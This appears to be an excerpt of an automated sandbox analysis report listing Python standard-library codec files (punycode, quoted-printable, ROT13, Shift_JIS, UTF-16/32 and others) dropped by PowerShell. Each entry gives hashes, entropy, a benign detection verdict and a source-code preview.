                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7120
                                                                                                                                                                                                                      Entropy (8bit):4.519199483696464
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:l3Dt9EqNFDPf3rBEX2M+4lCQ57+K6AWujvRI3:lRSO/SLV5SZ
                                                                                                                                                                                                                      MD5:DB14BE3F7A2ADCBCC07E2A32AD0A7198
                                                                                                                                                                                                                      SHA1:A4F5C43558E47C3F89EB807FEFB2F49119D51B75
                                                                                                                                                                                                                      SHA-256:823D1424AFA9508EA425F667F787567C80A6A28AE9742C66AA90A829ACC19748
                                                                                                                                                                                                                      SHA-512:5D572DF2302FF9F74BB4E5F884F8057CDEDFB7BC6C53E82809627BD982104CB42A595B3001C8B65E5C087E94CBEDBC088951ED0EBF0D3AE3C4D88823F3C89BA6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Codec for the Punicode encoding, as specified in RFC 3492....Written by Martin v. L.wis..."""....import codecs....##################### Encoding #####################################....def segregate(str):.. """3.1 Basic code point segregation""".. base = bytearray().. extended = set().. for c in str:.. if ord(c) < 128:.. base.append(ord(c)).. else:.. extended.add(c).. extended = sorted(extended).. return bytes(base), extended....def selective_len(str, max):.. """Return the length of str, considering only characters below max.""".. res = 0.. for c in str:.. if ord(c) < max:.. res += 1.. return res....def selective_find(str, char, index, pos):.. """Return a pair (index, pos), indicating the next occurrence of.. char in str. index is the position of the character considering.. only ordinals up to and including char, and pos is the position in.. the full string. index/pos is the starting p
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1581
                                                                                                                                                                                                                      Entropy (8bit):4.656023184812778
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5UeC1AIc1eq1AIrZ1+A1+0uwY+vIvBTKXgCJxHjH:5Uj7c1P7rZdBu6AJTKVrH
                                                                                                                                                                                                                      MD5:096A80038FB883522A68E9E6C434C6A6
                                                                                                                                                                                                                      SHA1:3FAFAD17359B000B8A417446E15D69EEE44A10B2
                                                                                                                                                                                                                      SHA-256:4BF9A405B6F2359E5B931E0D9FB9BD9609B013688CE2E58AEBBD9BFCB119A356
                                                                                                                                                                                                                      SHA-512:8088AE700A1C85C55BA10FE47EEC68193497DDC5145069C48D258604273F284F46A42D5F83D43D826A2C11CB1E71692A0D4D15005D63800F072DD883BA7890BB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Codec for quoted-printable encoding.....This codec de/encodes from bytes to bytes..."""....import codecs..import quopri..from io import BytesIO....def quopri_encode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.encode(f, g, quotetabs=True).. return (g.getvalue(), len(input))....def quopri_decode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.decode(f, g).. return (g.getvalue(), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return quopri_encode(input, errors).. def decode(self, input, errors='strict'):.. return quopri_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return quopri_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1378
                                                                                                                                                                                                                      Entropy (8bit):4.688171660474759
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JKmSEHV0yWfBx1yWfB8MufQfBxCb+nh5fBiiUQWSJzWSmi1GfBX9ZKj9UnQJxlTt:JVST31u0WMp6SJ6SL1CBTKanQJxHf
                                                                                                                                                                                                                      MD5:7B4C09E92D59EF6722DFCB9C79B792A7
                                                                                                                                                                                                                      SHA1:F413714763D5BC134CE873FEB69A4D79735C381B
                                                                                                                                                                                                                      SHA-256:2CC24FFC2D06CAB80423ADA94E3DFFC02C010346E17EFC2FFFE86825A6E07808
                                                                                                                                                                                                                      SHA-512:9584CF7FDC438C9E1D00CA3387A3F8AF103B3DDB41A65768131ACC5F3E7D40AF180D1991EF613451B2736E20D963BD2EC08F48106C15146134C8A42BB6A64D3A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'raw-unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.raw_unicode_escape_encode.. decode = codecs.raw_unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.raw_unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.raw_unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.raw_unicode_escape_dec
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2561
                                                                                                                                                                                                                      Entropy (8bit):4.800734764439435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:7Hk1rNJm1rNJbuvNJTNJi6SJ6S0TK/JxHjRohn3xrUAosYDYKQyaDl:7EvJmvJbu1JRJivCTK/rSh1U8eSyol
                                                                                                                                                                                                                      MD5:15F4EDEE2C94C2FB2F07435332C7A25A
                                                                                                                                                                                                                      SHA1:D110DE2410DE8170389F26082E79C33EA643C991
                                                                                                                                                                                                                      SHA-256:DC6052650356095A92A8CB3A6C63300B7F51A63B6CD3B6F636350B5F22CDA32A
                                                                                                                                                                                                                      SHA-512:B9A21BB0C6AF53193088CAAF45FD94AAC472FD87927281198D88E70DE07F5D938CCAE2D081D737DEA9C6D11ACB53DCF1E2E855B464DA9871B99D522692492EBD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:#!/usr/bin/env python..""" Python Character Mapping Codec for ROT13.....This codec de/encodes from str to str.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input)).... def decode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input))....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return str.translate(input, rot13_map)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return str.translate(input, rot13_map)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='rot-13',.. encode=Codec().encod
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1078
                                                                                                                                                                                                                      Entropy (8bit):4.563549974626686
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:n5SqSOzff/XokKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9RcJxFplR:5Sqfwm62VJjRU8njOxLnrxLbrLKUJxTz
                                                                                                                                                                                                                      MD5:9C02A2E9711192F5738426F6E7285B5C
                                                                                                                                                                                                                      SHA1:6AF9532F9C07B806DBA9D248A17E14B3EE637B1C
                                                                                                                                                                                                                      SHA-256:195C87BF032904002D5ADB51C256AE14D99F4A69FFC15C989CA34DD51FC203D7
                                                                                                                                                                                                                      SHA-512:3607DA04E5A83C27B8F6F3223872BF7957B58EA8326E19ECEB6A5836DD4E35B1A27CF43BBB4250E0CF0B931BB4BBEF6290FB6D30BEF407CC8C137277DBEB85D2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# shift_jis.py: Python Unicode Codec for SHIFT_JIS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1098
                                                                                                                                                                                                                      Entropy (8bit):4.636186915032078
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:njqMsOzff/XoRKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ocJxFplR:jqkwF62VJjRU8njOxLnrxLbrLKHJxTz
                                                                                                                                                                                                                      MD5:0440951B33F486E65DB5176D5CF99851
                                                                                                                                                                                                                      SHA1:D6269777856EC9BB88F7A0413A55EBCCE3BFBE17
                                                                                                                                                                                                                      SHA-256:B806ADF317A9920E69A1DEB14C7F078F0D5A9BD26BD370C89492F4DD296AA52A
                                                                                                                                                                                                                      SHA-512:A92FF2A9EB64C6E42E4CB808823E1B88CD760EC83EAB27BDAAB974152FB2B8DDC2288F800BE85A622F79304DADFD7E96DDEF86FED3434B73CC53967F873BBCEA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# shift_jis_2004.py: Python Unicode Codec for SHIFT_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1098
                                                                                                                                                                                                                      Entropy (8bit):4.656971526890629
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nAqqOzff/Xo2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9PcJxFplR:AqHw462VJjRU8njOxLnrxLbrLKCJxTz
                                                                                                                                                                                                                      MD5:CBAB0DA456CE49672F8A5CDB79018312
                                                                                                                                                                                                                      SHA1:A682827169185DA5BBA2B498BF0302B2EAE087A7
                                                                                                                                                                                                                      SHA-256:16BE3CDC9EFA7C3A6EC5A683BC03BCAA9DBB41FCC70C92900130175A761A9D62
                                                                                                                                                                                                                      SHA-512:EFE6CF1021E7FEEF474A3C0E0B346515410716DA6536488765803F2DBD1DA2A217F23F64484634C8EDDC149086F1AD82D563EB9A7C6319976FB852747CCCCF9D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# shift_jisx0213.py: Python Unicode Codec for SHIFT_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12607
                                                                                                                                                                                                                      Entropy (8bit):4.621772981576072
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:WHhsuOTDvR2LUrXPLouhIAs2+ijLf00pC8i5I:zTojuhIAl0H8iG
                                                                                                                                                                                                                      MD5:D9690A0F4A8779777A17C8E04C5EA6FF
                                                                                                                                                                                                                      SHA1:F10E74D2FDC0BE0582B97094F50BF4A38320C6FA
                                                                                                                                                                                                                      SHA-256:18AFE3A0FD28797D71762EAFFADC9822E0CB8832BE696AF2298F6727AB92627F
                                                                                                                                                                                                                      SHA-512:48AEBA9D13106BECC3305F42FB4C0A9B9D3A5663C807C7B42FAC579229D9FD43E2F15BBE3AA9DB6C19216334F296D584308BB12D93C4D998D0AF607ABB621BAA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec tis_620 generated from 'python-mappings/TIS-620.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='tis-620',.. encode=Cod
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1348
                                                                                                                                                                                                                      Entropy (8bit):4.667992147176458
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JldJcg5qSEH6e1cUe2e1cUeFMufKUeFhKUemUQWSJzWS09ZKj9EmIcJxlTpf:JldJ9ISo1ner1neKuhe5em6SJ6S0TK2M
                                                                                                                                                                                                                      MD5:7C6EF4AB65DA0214127F4E70CB74D180
                                                                                                                                                                                                                      SHA1:01D2D4FAE5C7C55DDD33CE3D5DB95BC56EA68E03
                                                                                                                                                                                                                      SHA-256:E882AD26197F05AFB20980407787F77D18E234F562E6EC396B7D9DF3C7EEF5FC
                                                                                                                                                                                                                      SHA-512:2DEC757B249BEC760DA00B5269D51C2F7ADEF574FD68A188B64304EB1B7974C84E0B4AB89A138764203D89231DFE76AA4784C466B384655B26D510FA58522E7E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'undefined' Codec.... This codec will always raise a ValueError exception when being.. used. It is intended for use by the site.py file to switch off.. automatic string to Unicode coercion.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding").... def decode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding")....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1350
                                                                                                                                                                                                                      Entropy (8bit):4.660145850496412
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JDmSEHV0yWcBx1yWcB8MufQcBxCb+nh5cBiiUQWSJzWSmi1GcBX9ZKj9jQJxlTpf:JaSAE1uzWbp6SJ6SL1tBTKpQJxHf
                                                                                                                                                                                                                      MD5:C939A021963EDD01807CDF57B08163D7
                                                                                                                                                                                                                      SHA1:5549D399865582B0A802D950E8B3B7FA4474D726
                                                                                                                                                                                                                      SHA-256:1D1372CF4F46E2F99820070B78563BD3EEED60FFC43A932B483CC7918F3DA5E9
                                                                                                                                                                                                                      SHA-512:8BF2450C2A44B4ED7B9E901C425AD7BA114E9B946E69FF0DB36644DBD82BF85266EB487C373179F50DB983CE0A51A03E52F43539F92DBC9BF69D39F5DBAE7753
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.unicode_escape_encode.. decode = codecs.unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.unicode_escape_decode(input, errors, False
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5391
                                                                                                                                                                                                                      Entropy (8bit):4.3113332789517
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:JgcgiEqCubuY5lRlE2GRCGEFdIXv5lLoQyLt6ofvBUpzdft0iL7+9WiV9lkip8IB:aruCouolRaRCRIhlL7yLt7vYfLL72blt
                                                                                                                                                                                                                      MD5:2867E58C229EB66CE2FC8704F1E380D2
                                                                                                                                                                                                                      SHA1:57CB01EF3A3CD16BCCB814C86A3B6DABC379B7C4
                                                                                                                                                                                                                      SHA-256:FD85A9D634B6F3868D6777E2B0367643571B3E61111B87C79F65DF3F57C7ACB3
                                                                                                                                                                                                                      SHA-512:7E08E1F9FFCF68123DA6B5B531ED0040AE652FC00DCCEAFCD2B4AF121CA627ECF7A4F9DC6AEB44EF8C040414F27BB3AC0B31FAB030A7BB6D5C2491CA5161CC12
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-16' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs, sys....### Codec APIs....encode = codecs.utf_16_encode....def decode(input, errors='strict'):.. return codecs.utf_16_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_16_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_16_le_encode.. else:.. self.encoder = codecs.utf_16_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... de
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                                                                      Entropy (8bit):4.776020747108792
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JMSEVyWuq1IjaatMufQBb+OyW80kzyWEzryW79ZKj9kJxFplR:JMS1q1I2aCuqEzSzhTKOJxTz
                                                                                                                                                                                                                      MD5:71C7BEDB2761CE2BCD7D4AB422CF4F40
                                                                                                                                                                                                                      SHA1:9BE6A38B88716031ED83825611C3B010284C3677
                                                                                                                                                                                                                      SHA-256:16329B46D794F4D13B38A7A2540002E72E176D85237872CA3A24BF3C90D7665C
                                                                                                                                                                                                                      SHA-512:D72E83FB2FD71EED49EC72F9B99B87A0341B2923091C6D92B5DEAB7C380418F8BFB868EE064A76FD321EBD2C2D8560A2559D76401730F199870374B4B555E35B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-16-be' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_be_encode....def decode(input, errors='strict'):.. return codecs.utf_16_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1079
                                                                                                                                                                                                                      Entropy (8bit):4.763394951954305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:J+SEVyWMq1IjP8atMufQfb+OyWPy0kzyWuzryWP19ZKj9qJxFplR:J+SHq1I4aCuYizgzXTKQJxTz
                                                                                                                                                                                                                      MD5:E34C5A24FE48A17FCBFC4335389F6C4E
                                                                                                                                                                                                                      SHA1:4FD9811F688CE9ADDF6B1315600707C46BA02D56
                                                                                                                                                                                                                      SHA-256:6D3B04F3ABD9FB6151FEE5CA0426C2E7ED2677EF1358C269747FF8946FFC02B9
                                                                                                                                                                                                                      SHA-512:2FE8D6111B3A81F509BB67AB452CEDF9721501222F16E3CCDC4E412BF7BB2383317269ED4059E2C1E82434EF6830794A6EB8AA7DDA2E6230290A8027E601BB10
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-16-le' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_16_le_encode....def decode(input, errors='strict'):.. return codecs.utf_16_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_16_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_16_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_16_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_16_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-16-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5279
                                                                                                                                                                                                                      Entropy (8bit):4.273683297819166
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:g+tqC0buY5lRlzeRCGEFdIPv5lLoQwLt6ofvBUpzdf/0iL7+zykV9bkMpZ/ut1fA:DkCSuolRMRCRMhlL7wLt7vYfVL7qbbpd
                                                                                                                                                                                                                      MD5:616CF58B40671374C8A7BB69A3EBC565
                                                                                                                                                                                                                      SHA1:2F71BE2439277B332CC255B7E0B0F11AFF9AB090
                                                                                                                                                                                                                      SHA-256:97F6038F368954DD48BE9B5FA41B1395A71FCA0271B0FEA69F8E16F9F6633775
                                                                                                                                                                                                                      SHA-512:43D921D34974BA356A0AE3B650516B7E1108DBFB10618BAC22A0485A5AD1B55D73B1090F77C69C67ACD0C3BE231E4DBD02A32040BCF88FA646610C91F819F341
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""..Python 'utf-32' Codec.."""..import codecs, sys....### Codec APIs....encode = codecs.utf_32_encode....def decode(input, errors='strict'):.. return codecs.utf_32_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.encoder = None.... def encode(self, input, final=False):.. if self.encoder is None:.. result = codecs.utf_32_encode(input, self.errors)[0].. if sys.byteorder == 'little':.. self.encoder = codecs.utf_32_le_encode.. else:.. self.encoder = codecs.utf_32_be_encode.. return result.. return self.encoder(input, self.errors)[0].... def reset(self):.. codecs.IncrementalEncoder.reset(self).. self.encoder = None.... def getstate(self):.. # state info we return to the caller:.. # 0: stream is in natural order for th
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):967
                                                                                                                                                                                                                      Entropy (8bit):4.64840879615024
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:g6VyWEq1IjsatMufQ3b+OyWi0kzyWWzryWF9ZKj9KJxFplR:gRq1IQaCusKzwzXTKYJxTz
                                                                                                                                                                                                                      MD5:85519A8598572F85931621ACCB60DB87
                                                                                                                                                                                                                      SHA1:2B7912D3F1D4042A0778C22C068A18A9AD00B990
                                                                                                                                                                                                                      SHA-256:A3698A68287CC78323117D14BE3B0B40F46289A850EB06AA9A5328D44B2A30EF
